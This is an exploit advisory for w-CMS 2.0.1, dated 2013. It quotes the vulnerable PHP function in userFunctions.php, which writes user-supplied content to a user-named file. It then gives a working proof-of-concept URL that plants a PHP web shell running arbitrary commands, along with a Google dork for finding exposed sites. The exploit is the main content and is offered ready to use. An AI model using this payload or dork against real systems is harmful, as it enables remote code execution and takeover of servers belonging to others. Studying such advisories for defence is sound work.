Exploit Title: w-CMS 2.0.1 Remote Code Execution Vulnerability
Google Dork: intext:"Powered by w-CMS"
Date: 15/08/2013
Exploit Author: ICheer_No0M - http://icheernoom.blogspot.com/
Vendor Homepage: http://w-cms.org/
Software Link: -
Version: 2.0.1
Tested on: Windows 7 + PHP 5.2.6
---> Vuln Code : /userFunctions.php
6. switch($_REQUEST['udef']) // user defined function
11. case 'activity': procActivity(); // <-- call procActivity Function
254. function procActivity()
255. {
256. $type= $_REQUEST['type']; // <-- type
257. $content = $_REQUEST['content']; // <-- content
258. $content = preg_replace("/\|/","\0xff ",$content)."\n";
259. $data = explode("\n",@file_get_contents("./public/$type"));
260. $file = @fopen("./public/$type", "w"); // <-- filename = $type
261. if($file);
262. {
263. fwrite($file, $content); // <-- fwrite to write $content into $filename
264. for($ix=0;$ix<25;$ix++)
265. {
266. fwrite($file,$data[$ix]."\n");
267. }
268. fclose($file);
269. }
---> Exploit/Proof of Concept (PoC)
http://localhost/wcms/userFunctions.php?udef=activity&type=shell.php&content=<?php system($_GET['cmd']); ?>
Find your shell on /public/shell.php